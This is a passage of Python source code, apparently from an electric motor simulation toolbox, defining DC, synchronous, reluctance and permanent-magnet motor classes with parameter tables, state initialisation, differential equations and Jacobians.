# hardcoded for Inductionmotors currently given in the toolbox
state_space_low = np.array([-1, -1, -1, -1, -1])
lower_bound = upper_bound * state_space_low
else:
if isinstance(self._nominal_values, dict):
nominal_values_ = [self._nominal_values[state]
for state in self._initial_states.keys()]
nominal_values_ = np.asarray(nominal_values_)
else:
nominal_values_ = np.asarray(self._nominal_values)
state_space_idx = [state_positions[state] for state in
self._initial_states.keys()]
upper_bound = np.asarray(nominal_values_, dtype=float)
lower_bound = upper_bound * \
np.asarray(state_space.low, dtype=float)[state_space_idx]
# clip nominal boundaries to user defined
if interval is not None:
lower_bound = np.clip(lower_bound,
a_min=
np.asarray(interval, dtype=float).T[0],
a_max=None)
upper_bound = np.clip(upper_bound,
a_min=None,
a_max=
np.asarray(interval, dtype=float).T[1])
# random initialization for each motor state (current, epsilon)
if random_dist is not None:
if random_dist == 'uniform':
initial_value = (upper_bound - lower_bound) * \
np.random.random_sample(
len(self._initial_states.keys())) + \
lower_bound
# writing initial values in initial_states dict
random_states = \
{state: initial_value[idx]
for idx, state in enumerate(self._initial_states.keys())}
self._initial_states.update(random_states)
elif random_dist in ['normal', 'gaussian']:
# specific input or middle of interval
mue = random_params[0] or (upper_bound - lower_bound) / 2 + lower_bound
sigma = random_params[1] or 1
a, b = (lower_bound - mue) / sigma, (upper_bound - mue) / sigma
initial_value = truncnorm.rvs(a, b,
loc=mue,
scale=sigma,
size=(len(self._initial_states.keys())))
# writing initial values in initial_states dict
random_states = \
{state: initial_value[idx]
for idx, state in enumerate(self._initial_states.keys())}
self._initial_states.update(random_states)
else:
# todo implement other distribution
raise NotImplementedError
# constant initialization for each motor state (current, epsilon)
elif self._initial_states is not None:
initial_value = np.atleast_1d(list(self._initial_states.values()))
# check init_value meets interval boundaries
if ((lower_bound <= initial_value).all()
and (initial_value <= upper_bound).all()):
initial_states_ = \
{state: initial_value[idx]
for idx, state in enumerate(self._initial_states.keys())}
self._initial_states.update(initial_states_)
else:
raise Exception('Initialization value has to be within nominal boundaries')
else:
raise Exception('No matching Initialization Case')
def reset(self,
state_space,
state_positions,
**__):
"""
Reset the motors state to a new initial state. (Default 0)
Args:
state_space(gym.Box): normalized state space boundaries
state_positions(dict): indexes of system states
Returns:
numpy.ndarray(float): The initial motor states.
"""
# check for valid initializer
if self._initializer and self._initializer['states']:
self.initialize(state_space, state_positions)
return np.asarray(list(self._initial_states.values()))
else:
return np.zeros(len(self.CURRENTS))
def i_in(self, state):
"""
Args:
state(ndarray(float)): ODE state of the motor
Returns:
list(float): List of all currents flowing into the motor.
"""
raise NotImplementedError
def _update_limits(self, limits_d={}, nominal_d={}):
"""Replace missing limits and nominal values with physical maximums.
Args:
limits_d(dict): Mapping: quantitity to its limit if not specified
"""
# omega is replaced the same way for all motor types
limits_d.update(dict(omega=self._default_limits['omega']))
for qty, lim in limits_d.items():
if self._limits.get(qty, 0) == 0:
self._limits[qty] = lim
for entry in self._limits.keys():
if self._nominal_values.get(entry, 0) == 0:
self._nominal_values[entry] = nominal_d.get(entry, None) or \
self._limits[entry]
def _update_initial_limits(self, nominal_new={}, **kwargs):
"""
Complete initial states with further state limits
Args:
nominal_new(dict): new/further state limits
"""
self._initial_limits.update(nominal_new)
class DcMotor(ElectricMotor):
"""
The DcMotor and its subclasses implement the technical system of a dc motor.
This includes the system equations, the motor parameters of the equivalent circuit diagram,
as well as limits.
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_a Ohm 0.78 Armature circuit resistance
r_e Ohm 25 Exciting circuit resistance
l_a H 6.3e-3 Armature circuit inductance
l_e H 1.2 Exciting circuit inductance
l_e_prime H 0.0094 Effective excitation inductance
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_a A Armature circuit current
i_e A Exciting circuit current
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u_a V Armature circuit voltage
u_e v Exciting circuit voltage
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i_a Armature current
i_e Exciting current
omega Angular Velocity
torque Motor generated torque
u_a Armature Voltage
u_e Exciting Voltage
======== ===========================================================
"""
# Indices for array accesses
I_A_IDX = 0
I_E_IDX = 1
CURRENTS_IDX = [0, 1]
CURRENTS = ['i_a', 'i_e']
VOLTAGES = ['u_a', 'u_e']
_default_motor_parameter = {
'r_a': 0.78, 'r_e': 25, 'l_a': 6.3e-3, 'l_e': 1.2, 'l_e_prime': 0.0094,
'j_rotor': 0.017,
}
_default_nominal_values = {'omega': 368, 'torque': 0.0, 'i_a': 50,
'i_e': 1.2, 'u': 420}
_default_limits = {'omega': 500, 'torque': 0.0, 'i_a': 75, 'i_e': 2,
'u': 420}
_default_initializer = {'states': {'i_a': 0.0, 'i_e': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
def __init__(self, motor_parameter=None, nominal_values=None,
limit_values=None, motor_initializer=None, **__):
# Docstring of superclass
super().__init__(motor_parameter, nominal_values,
limit_values, motor_initializer)
#: Matrix that contains the constant parameters of the systems equation for faster computation
self._model_constants = None
self._update_model()
self._update_limits()
def _update_model(self):
"""
Update the motors model parameters with the motor parameters.
Called internally when the motor parameters are changed or the motor is initialized.
"""
mp = self._motor_parameter
self._model_constants = np.array([
[-mp['r_a'], 0, -mp['l_e_prime'], 1, 0],
[0, -mp['r_e'], 0, 0, 1]
])
self._model_constants[self.I_A_IDX] = self._model_constants[
self.I_A_IDX] / mp['l_a']
self._model_constants[self.I_E_IDX] = self._model_constants[
self.I_E_IDX] / mp['l_e']
def torque(self, currents):
# Docstring of superclass
return self._motor_parameter['l_e_prime'] * currents[self.I_A_IDX] * \
currents[self.I_E_IDX]
def i_in(self, currents):
# Docstring of superclass
return list(currents)
def electrical_ode(self, state, u_in, omega, *_):
# Docstring of superclass
return np.matmul(self._model_constants, np.array([
state[self.I_A_IDX],
state[self.I_E_IDX],
omega * state[self.I_E_IDX],
u_in[0],
u_in[1],
]))
def get_state_space(self, input_currents, input_voltages):
"""
Calculate the possible normalized state space for the motor as a tuple of dictionaries "low" and "high".
Args:
input_currents: Tuple of the two converters possible output currents.
input_voltages: Tuple of the two converters possible output voltages.
Returns:
tuple(dict,dict): Dictionaries defining if positive and negative values are possible for each motors state.
"""
a_converter = 0
e_converter = 1
low = {
'omega': -1 if input_voltages.low[a_converter] == -1
or input_voltages.low[e_converter] == -1 else 0,
'torque': -1 if input_currents.low[a_converter] == -1
or input_currents.low[e_converter] == -1 else 0,
'i_a': -1 if input_currents.low[a_converter] == -1 else 0,
'i_e': -1 if input_currents.low[e_converter] == -1 else 0,
'u_a': -1 if input_voltages.low[a_converter] == -1 else 0,
'u_e': -1 if input_voltages.low[e_converter] == -1 else 0,
}
high = {
'omega': 1,
'torque': 1,
'i_a': 1,
'i_e': 1,
'u_a': 1,
'u_e': 1
}
return low, high
def _update_limits(self, limits_d={}):
# Docstring of superclass
# torque is replaced the same way for all DC motors
limits_d.update(dict(torque=self.torque([self._limits[state] for state
in self.CURRENTS])))
super()._update_limits(limits_d)
class DcShuntMotor(DcMotor):
"""
The DcShuntMotor is a DC motor with parallel armature and exciting circuit connected to one input voltage.
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_a Ohm 0.78 Armature circuit resistance
r_e Ohm 25 Exciting circuit resistance
l_a H 6.3e-3 Armature circuit inductance
l_e H 1.2 Exciting circuit inductance
l_e_prime H 0.0094 Effective excitation inductance
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_a A Armature circuit current
i_e A Exciting circuit current
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u V Voltage applied to both circuits
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i_a Armature current
i_e Exciting current
omega Angular Velocity
torque Motor generated torque
u Voltage
======== ===========================================================
"""
HAS_JACOBIAN = True
VOLTAGES = ['u']
_default_nominal_values = {'omega': 368, 'torque': 0.0, 'i_a': 50,
'i_e': 1.2, 'u': 420}
_default_limits = {'omega': 500, 'torque': 0.0, 'i_a': 75, 'i_e': 2,
'u': 420}
_default_initializer = {'states': {'i_a': 0.0, 'i_e': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
def i_in(self, state):
# Docstring of superclass
return [state[self.I_A_IDX] + state[self.I_E_IDX]]
def electrical_ode(self, state, u_in, omega, *_):
# Docstring of superclass
return super().electrical_ode(state, (u_in[0], u_in[0]), omega)
def electrical_jacobian(self, state, u_in, omega, *_):
mp = self._motor_parameter
return (
np.array([
[-mp['r_a'] / mp['l_a'], -mp['l_e_prime'] / mp['l_a'] * omega],
[0, -mp['r_e'] / mp['l_e']]
]),
np.array([-mp['l_e_prime'] * state[self.I_E_IDX] / mp['l_a'], 0]),
np.array([mp['l_e_prime'] * state[self.I_E_IDX],
mp['l_e_prime'] * state[self.I_A_IDX]])
)
def get_state_space(self, input_currents, input_voltages):
"""
Calculate the possible normalized state space for the motor as a tuple of dictionaries "low" and "high".
Args:
input_currents: The converters possible output currents.
input_voltages: The converters possible output voltages.
Returns:
tuple(dict,dict): Dictionaries defining if positive and negative values are possible for each motors state.
"""
lower_limit = 0
low = {
'omega': 0,
'torque': -1 if input_currents.low[0] == -1 else 0,
'i_a': -1 if input_currents.low[0] == -1 else 0,
'i_e': -1 if input_currents.low[0] == -1 else 0,
'u': -1 if input_voltages.low[0] == -1 else 0,
}
high = {
'omega': 1,
'torque': 1,
'i_a': 1,
'i_e': 1,
'u': 1,
}
return low, high
def _update_limits(self):
# Docstring of superclass
# R_a might be 0, protect against that
r_a = 1 if self._motor_parameter['r_a'] == 0 else self._motor_parameter['r_a']
limit_agenda = \
{'u': self._default_limits['u'],
'i_a': self._limits.get('i', None) or
self._limits['u'] / r_a,
'i_e': self._limits.get('i', None) or
self._limits['u'] / self.motor_parameter['r_e'],
}
super()._update_limits(limit_agenda)
class DcSeriesMotor(DcMotor):
"""
The DcSeriesMotor is a DcMotor with an armature and exciting circuit connected in series to one input voltage.
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_a Ohm 2.78 Armature circuit resistance
r_e Ohm 1.0 Exciting circuit resistance
l_a H 6.3e-3 Armature circuit inductance
l_e H 1.6e-3 Exciting circuit inductance
l_e_prime H 0.05 Effective excitation inductance
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i A Circuit current
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u V Circuit voltage
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i Circuit Current
omega Angular Velocity
torque Motor generated torque
u Circuit Voltage
======== ===========================================================
"""
HAS_JACOBIAN = True
I_IDX = 0
CURRENTS_IDX = [0]
CURRENTS = ['i']
VOLTAGES = ['u']
_default_motor_parameter = {
'r_a': 2.78, 'r_e': 1.0, 'l_a': 6.3e-3, 'l_e': 1.6e-3,
'l_e_prime': 0.05, 'j_rotor': 0.017,
}
_default_nominal_values = dict(omega=80, torque=0.0, i=50, u=420)
_default_limits = dict(omega=100, torque=0.0, i=100, u=420)
_default_initializer = {'states': {'i': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
def _update_model(self):
# Docstring of superclass
mp = self._motor_parameter
self._model_constants = np.array([
[-mp['r_a'] - mp['r_e'], -mp['l_e_prime'], 1]
])
self._model_constants[self.I_IDX] = self._model_constants[
self.I_IDX] / (
mp['l_a'] + mp['l_e'])
def torque(self, currents):
# Docstring of superclass
return super().torque([currents[self.I_IDX], currents[self.I_IDX]])
def electrical_ode(self, state, u_in, omega, *_):
# Docstring of superclass
return np.matmul(
self._model_constants,
np.array([
state[self.I_IDX],
omega * state[self.I_IDX],
u_in[0]
])
)
def i_in(self, state):
# Docstring of superclass
return state[self.CURRENTS_IDX]
def _update_limits(self):
# Docstring of superclass
# R_a might be 0, protect against that
r_a = 1 if self._motor_parameter['r_a'] == 0 else self._motor_parameter['r_a']
limits_agenda = {
'u': self._default_limits['u'],
'i': self._limits['u'] / (r_a + self._motor_parameter['r_e']),
}
super()._update_limits(limits_agenda)
def get_state_space(self, input_currents, input_voltages):
# Docstring of superclass
lower_limit = 0
low = {
'omega': 0,
'torque': 0,
'i': -1 if input_currents.low[0] == -1 else 0,
'u': -1 if input_voltages.low[0] == -1 else 0,
}
high = {
'omega': 1,
'torque': 1,
'i': 1,
'u': 1,
}
return low, high
def electrical_jacobian(self, state, u_in, omega, *_):
mp = self._motor_parameter
return (
np.array([[-(mp['r_a'] + mp['r_e'] + mp['l_e_prime'] * omega) / (
mp['l_a'] + mp['l_e'])]]),
np.array([-mp['l_e_prime'] * state[self.I_IDX] / (
mp['l_a'] + mp['l_e'])]),
np.array([2 * mp['l_e_prime'] * state[self.I_IDX]])
)
class DcPermanentlyExcitedMotor(DcMotor):
"""
The DcPermanentlyExcitedMotor is a DcMotor with a Permanent Magnet instead of the excitation circuit.
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_a Ohm 25.0 Armature circuit resistance
l_a H 3.438e-2 Armature circuit inductance
psi_e Wb 18 Magnetic Flux of the permanent magnet
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i A Circuit current
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u V Circuit voltage
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i Circuit Current
omega Angular Velocity
torque Motor generated torque
u Circuit Voltage
======== ===========================================================
"""
I_IDX = 0
CURRENTS_IDX = [0]
CURRENTS = ['i']
VOLTAGES = ['u']
HAS_JACOBIAN = True
_default_motor_parameter = {
'r_a': 25.0, 'l_a': 3.438e-2, 'psi_e': 18, 'j_rotor': 0.017
}
_default_nominal_values = dict(omega=22, torque=0.0, i=16, u=400)
_default_limits = dict(omega=50, torque=0.0, i=25, u=400)
_default_initializer = {'states': {'i': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
# placeholder for omega, currents and u_in
_ode_placeholder = np.zeros(2 + len(CURRENTS_IDX), dtype=np.float64)
def torque(self, state):
# Docstring of superclass
return self._motor_parameter['psi_e'] * state[self.I_IDX]
def _update_model(self):
# Docstring of superclass
mp = self._motor_parameter
self._model_constants = np.array([
[-mp['psi_e'], -mp['r_a'], 1.0]
])
self._model_constants[self.I_IDX] /= mp['l_a']
def i_in(self, state):
# Docstring of superclass
return state[self.CURRENTS_IDX]
def electrical_ode(self, state, u_in, omega, *_):
# Docstring of superclass
self._ode_placeholder[:] = [omega] + np.atleast_1d(
state[self.I_IDX]).tolist() \
+ [u_in[0]]
return np.matmul(self._model_constants, self._ode_placeholder)
def electrical_jacobian(self, state, u_in, omega, *_):
mp = self._motor_parameter
return (
np.array([[-mp['r_a'] / mp['l_a']]]),
np.array([-mp['psi_e'] / mp['l_a']]),
np.array([mp['psi_e']])
)
def _update_limits(self):
# Docstring of superclass
# R_a might be 0, protect against that
r_a = 1 if self._motor_parameter['r_a'] == 0 else self._motor_parameter['r_a']
limits_agenda = {
'u': self._default_limits['u'],
'i': self._limits['u'] / r_a,
}
super()._update_limits(limits_agenda)
def get_state_space(self, input_currents, input_voltages):
# Docstring of superclass
lower_limit = 0
low = {
'omega': -1 if input_voltages.low[0] == -1 else 0,
'torque': -1 if input_currents.low[0] == -1 else 0,
'i': -1 if input_currents.low[0] == -1 else 0,
'u': -1 if input_voltages.low[0] == -1 else 0,
}
high = {
'omega': 1,
'torque': 1,
'i': 1,
'u': 1,
}
return low, high
class DcExternallyExcitedMotor(DcMotor):
# Equals DC Base Motor
HAS_JACOBIAN = True
def electrical_jacobian(self, state, u_in, omega, *_):
mp = self._motor_parameter
return (
np.array([
[-mp['r_a'] / mp['l_a'], -mp['l_e_prime'] / mp['l_a'] * omega],
[0, -mp['r_e'] / mp['l_e']]
]),
np.array([-mp['l_e_prime'] * state[self.I_E_IDX] / mp['l_a'], 0]),
np.array([mp['l_e_prime'] * state[self.I_E_IDX],
mp['l_e_prime'] * state[self.I_A_IDX]])
)
def _update_limits(self):
# Docstring of superclass
# R_a might be 0, protect against that
r_a = 1 if self._motor_parameter['r_a'] == 0 else self._motor_parameter['r_a']
limit_agenda = \
{'u_a': self._default_limits['u'],
'u_e': self._default_limits['u'],
'i_a': self._limits.get('i', None) or
self._limits['u'] / r_a,
'i_e': self._limits.get('i', None) or
self._limits['u'] / self.motor_parameter['r_e'],
}
super()._update_limits(limit_agenda)
class ThreePhaseMotor(ElectricMotor):
"""
The ThreePhaseMotor and its subclasses implement the technical system of Three Phase Motors.
This includes the system equations, the motor parameters of the equivalent circuit diagram,
as well as limits and bandwidth.
"""
# transformation matrix from abc to alpha-beta representation
_t23 = 2 / 3 * np.array([
[1, -0.5, -0.5],
[0, 0.5 * np.sqrt(3), -0.5 * np.sqrt(3)]
])
# transformation matrix from alpha-beta to abc representation
_t32 = np.array([
[1, 0],
[-0.5, 0.5 * np.sqrt(3)],
[-0.5, -0.5 * np.sqrt(3)]
])
@staticmethod
def t_23(quantities):
"""
Transformation from abc representation to alpha-beta representation
Args:
quantities: The properties in the abc representation like ''[u_a, u_b, u_c]''
Returns:
The converted quantities in the alpha-beta representation like ''[u_alpha, u_beta]''
"""
return np.matmul(ThreePhaseMotor._t23, quantities)
@staticmethod
def t_32(quantities):
"""
Transformation from alpha-beta representation to abc representation
Args:
quantities: The properties in the alpha-beta representation like ``[u_alpha, u_beta]``
Returns:
The converted quantities in the abc representation like ``[u_a, u_b, u_c]``
"""
return np.matmul(ThreePhaseMotor._t32, quantities)
@staticmethod
def q(quantities, epsilon):
"""
Transformation of the dq-representation into alpha-beta using the electrical angle
Args:
quantities: Array of two quantities in dq-representation. Example [i_d, i_q]
epsilon: Current electrical angle of the motor
Returns:
Array of the two quantities converted to alpha-beta-representation. Example [u_alpha, u_beta]
"""
cos = math.cos(epsilon)
sin = math.sin(epsilon)
return cos * quantities[0] - sin * quantities[1], sin * quantities[
0] + cos * quantities[1]
@staticmethod
def q_inv(quantities, epsilon):
"""
Transformation of the alpha-beta-representation into dq using the electrical angle
Args:
quantities: Array of two quantities in alpha-beta-representation. Example [u_alpha, u_beta]
epsilon: Current electrical angle of the motor
Returns:
Array of the two quantities converted to dq-representation. Example [u_d, u_q]
Note:
The transformation from alpha-beta to dq is just its inverse conversion with negated epsilon.
So this method calls q(quantities, -epsilon).
"""
return SynchronousMotor.q(quantities, -epsilon)
def q_me(self, quantities, epsilon):
"""
Transformation of the dq-representation into alpha-beta using the mechanical angle
Args:
quantities: Array of two quantities in dq-representation. Example [i_d, i_q]
epsilon: Current mechanical angle of the motor
Returns:
Array of the two quantities converted to alpha-beta-representation. Example [u_alpha, u_beta]
"""
return self.q(quantities, epsilon * self._motor_parameter['p'])
def q_inv_me(self, quantities, epsilon):
"""
Transformation of the alpha-beta-representation into dq using the mechanical angle
Args:
quantities: Array of two quantities in alpha-beta-representation. Example [u_alpha, u_beta]
epsilon: Current mechanical angle of the motor
Returns:
Array of the two quantities converted to dq-representation. Example [u_d, u_q]
Note:
The transformation from alpha-beta to dq is just its inverse conversion with negated epsilon.
So this method calls q(quantities, -epsilon).
"""
return self.q_me(quantities, -epsilon)
def _torque_limit(self):
"""
Returns:
Maximal possible torque for the given limits in self._limits
"""
raise NotImplementedError()
def _update_limits(self, limits_d={}, nominal_d={}):
# Docstring of superclass
super()._update_limits(limits_d, nominal_d)
super()._update_limits(dict(torque=self._torque_limit()))
def _update_initial_limits(self, nominal_new={}, **kwargs):
# Docstring of superclass
super()._update_initial_limits(self._nominal_values)
super()._update_initial_limits(nominal_new)
class SynchronousMotor(ThreePhaseMotor):
"""
The SynchronousMotor and its subclasses implement the technical system of a three phase synchronous motor.
This includes the system equations, the motor parameters of the equivalent circuit diagram,
as well as limits and bandwidth.
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_s Ohm 0.78 Stator resistance
l_d H 1.2 Direct axis inductance
l_q H 6.3e-3 Quadrature axis inductance
psi_p Wb 0.0094 Effective excitation flux (PMSM only)
p 1 2 Pole pair number
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_sd A Direct axis current
i_sq A Quadrature axis current
i_a A Current through branch a
i_b A Current through branch b
i_c A Current through branch c
i_alpha A Current in alpha axis
i_beta A Current in beta axis
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u_sd A Direct axis voltage
u_sq A Quadrature axis voltage
u_a A Voltage through branch a
u_b A Voltage through branch b
u_c A Voltage through branch c
u_alpha A Voltage in alpha axis
u_beta A Voltage in beta axis
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i General current limit / nominal value
i_a Current in phase a
i_b Current in phase b
i_c Current in phase c
i_alpha Current in alpha axis
i_beta Current in beta axis
i_sd Current in direct axis
i_sq Current in quadrature axis
omega Mechanical angular Velocity
epsilon Electrical rotational angle
torque Motor generated torque
u_a Voltage in phase a
u_b Voltage in phase b
u_c Voltage in phase c
u_alpha Voltage in alpha axis
u_beta Voltage in beta axis
u_sd Voltage in direct axis
u_sq Voltage in quadrature axis
======== ===========================================================
Note:
The voltage limits should be the amplitude of the phase voltage (:math:`\hat{u}_S`).
Typically the rms value for the line voltage (:math:`U_L`) is given.
:math:`\hat{u}_S=\sqrt{2/3}~U_L`
The current limits should be the amplitude of the phase current (:math:`\hat{i}_S`).
Typically the rms value for the phase current (:math:`I_S`) is given.
:math:`\hat{i}_S = \sqrt{2}~I_S`
If not specified, nominal values are equal to their corresponding limit values.
Furthermore, if specific limits/nominal values (e.g. i_a) are not specified they are inferred from
the general limits/nominal values (e.g. i)
"""
I_SD_IDX = 0
I_SQ_IDX = 1
EPSILON_IDX = 2
CURRENTS_IDX = [0, 1]
CURRENTS = ['i_sd', 'i_sq']
VOLTAGES = ['u_sd', 'u_sq']
_model_constants = None
_initializer = None
def __init__(self, motor_parameter=None, nominal_values=None,
limit_values=None, motor_initializer=None, **kwargs):
# Docstring of superclass
nominal_values = nominal_values or {}
limit_values = limit_values or {}
super().__init__(motor_parameter, nominal_values,
limit_values, motor_initializer)
self._update_model()
self._update_limits()
@property
def motor_parameter(self):
# Docstring of superclass
return self._motor_parameter
@property
def initializer(self):
# Docstring of superclass
return self._initializer
def reset(self, state_space,
state_positions,
**__):
# Docstring of superclass
if self._initializer and self._initializer['states']:
self.initialize(state_space, state_positions)
return np.asarray(list(self._initial_states.values()))
else:
return np.zeros(len(self.CURRENTS) + 1)
def torque(self, state):
# Docstring of superclass
raise NotImplementedError
def _update_model(self):
"""
Set motor parameters into a matrix for faster computation
"""
raise NotImplementedError
def electrical_ode(self, state, u_dq, omega, *_):
"""
The differential equation of the Synchronous Motor.
Args:
state: The current state of the motor. [i_sd, i_sq, epsilon]
omega: The mechanical load
u_qd: The input voltages [u_sd, u_sq]
Returns:
The derivatives of the state vector d/dt([i_sd, i_sq, epsilon])
"""
return np.matmul(self._model_constants, np.array([
omega,
state[self.I_SD_IDX],
state[self.I_SQ_IDX],
u_dq[0],
u_dq[1],
omega * state[self.I_SD_IDX],
omega * state[self.I_SQ_IDX],
]))
def i_in(self, state):
# Docstring of superclass
return state[self.CURRENTS_IDX]
def _update_limits(self):
# Docstring of superclass
voltage_limit = 0.5 * self._limits['u']
voltage_nominal = 0.5 * self._nominal_values['u']
limits_agenda = {}
nominal_agenda = {}
for u, i in zip(self.IO_VOLTAGES, self.IO_CURRENTS):
limits_agenda[u] = voltage_limit
nominal_agenda[u] = voltage_nominal
limits_agenda[i] = self._limits.get('i', None) or \
self._limits[u] / self._motor_parameter['r_s']
nominal_agenda[i] = self._nominal_values.get('i', None) or \
self._nominal_values[u] / \
self._motor_parameter['r_s']
super()._update_limits(limits_agenda, nominal_agenda)
# def initialize(self,
# state_space,
# state_positions,
# **__):
# super().initialize(state_space, state_positions)
class SynchronousReluctanceMotor(SynchronousMotor):
"""
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_s Ohm 0.78 Stator resistance
l_d H 1.2 Direct axis inductance
l_q H 6.3e-3 Quadrature axis inductance
p 1 2 Pole pair number
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_sd A Direct axis current
i_sq A Quadrature axis current
i_a A Current through branch a
i_b A Current through branch b
i_c A Current through branch c
i_alpha A Current in alpha axis
i_beta A Current in beta axis
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u_sd V Direct axis voltage
u_sq V Quadrature axis voltage
u_a V Voltage through branch a
u_b V Voltage through branch b
u_c V Voltage through branch c
u_alpha V Voltage in alpha axis
u_beta V Voltage in beta axis
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i General current limit / nominal value
i_a Current in phase a
i_b Current in phase b
i_c Current in phase c
i_alpha Current in alpha axis
i_beta Current in beta axis
i_sd Current in direct axis
i_sq Current in quadrature axis
omega Mechanical angular Velocity
epsilon Electrical rotational angle
torque Motor generated torque
u_a Voltage in phase a
u_b Voltage in phase b
u_c Voltage in phase c
u_alpha Voltage in alpha axis
u_beta Voltage in beta axis
u_sd Voltage in direct axis
u_sq Voltage in quadrature axis
======== ===========================================================
Note:
The voltage limits should be the amplitude of the phase voltage (:math:`\hat{u}_S`).
Typically the rms value for the line voltage (:math:`U_L`) is given.
:math:`\hat{u}_S=\sqrt{2/3}~U_L`
The current limits should be the amplitude of the phase current (:math:`\hat{i}_S`).
Typically the rms value for the phase current (:math:`I_S`) is given.
:math:`\hat{i}_S = \sqrt{2}~I_S`
If not specified, nominal values are equal to their corresponding limit values.
Furthermore, if specific limits/nominal values (e.g. i_a) are not specified they are inferred from
the general limits/nominal values (e.g. i)
"""
HAS_JACOBIAN = True
#### Parameters taken from DOI: 10.1109/AMC.2008.4516099 (<NAME>, <NAME>, <NAME>)
_default_motor_parameter = {'p': 4,
'l_d': 10.1e-3,
'l_q': 4.1e-3,
'j_rotor': 0.8e-3,
'r_s': 0.57
}
_default_nominal_values = {'i': 10, 'torque': 0, 'omega': 3e3 * np.pi / 30, 'epsilon': np.pi, 'u': 100}
_default_limits = {'i': 13, 'torque': 0, 'omega': 4.3e3 * np.pi / 30, 'epsilon': np.pi, 'u': 100}
_default_initializer = {'states': {'i_sq': 0.0, 'i_sd': 0.0, 'epsilon': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
IO_VOLTAGES = ['u_a', 'u_b', 'u_c', 'u_sd', 'u_sq']
IO_CURRENTS = ['i_a', 'i_b', 'i_c', 'i_sd', 'i_sq']
def _update_model(self):
# Docstring of superclass
mp = self._motor_parameter
self._model_constants = np.array([
# omega, i_sd, i_sq, u_sd, u_sq, omega * i_sd, omega * i_sq
[ 0, -mp['r_s'], 0, 1, 0, 0, mp['l_q'] * mp['p']],
[ 0, 0, -mp['r_s'], 0, 1, -mp['l_d'] * mp['p'], 0],
[mp['p'], 0, 0, 0, 0, 0, 0]
])
self._model_constants[self.I_SD_IDX] = self._model_constants[self.I_SD_IDX] / mp['l_d']
self._model_constants[self.I_SQ_IDX] = self._model_constants[self.I_SQ_IDX] / mp['l_q']
def _torque_limit(self):
# Docstring of superclass
return self.torque([self._limits['i_sd'] / np.sqrt(2), self._limits['i_sq'] / np.sqrt(2), 0])
def torque(self, currents):
# Docstring of superclass
mp = self._motor_parameter
return 1.5 * mp['p'] * (
(mp['l_d'] - mp['l_q']) * currents[self.I_SD_IDX]) * \
currents[self.I_SQ_IDX]
def electrical_jacobian(self, state, u_in, omega, *_):
mp = self._motor_parameter
return (
np.array([
[-mp['r_s'] / mp['l_d'], mp['l_q'] / mp['l_d'] * mp['p'] * omega, 0],
[-mp['l_d'] / mp['l_q'] * mp['p'] * omega, -mp['r_s'] / mp['l_q'], 0],
[0, 0, 0]
]),
np.array([
mp['p'] * mp['l_q'] / mp['l_d'] * state[self.I_SQ_IDX],
- mp['p'] * mp['l_d'] / mp['l_q'] * state[self.I_SD_IDX],
mp['p']
]),
np.array([
1.5 * mp['p'] * (mp['l_d'] - mp['l_q']) * state[self.I_SQ_IDX],
1.5 * mp['p'] * (mp['l_d'] - mp['l_q']) * state[self.I_SD_IDX],
0
])
)
class PermanentMagnetSynchronousMotor(SynchronousMotor):
"""
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_s Ohm 0.78 Stator resistance
l_d H 1.2 Direct axis inductance
l_q H 6.3e-3 Quadrature axis inductance
p 1 2 Pole pair number
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_sd A Direct axis current
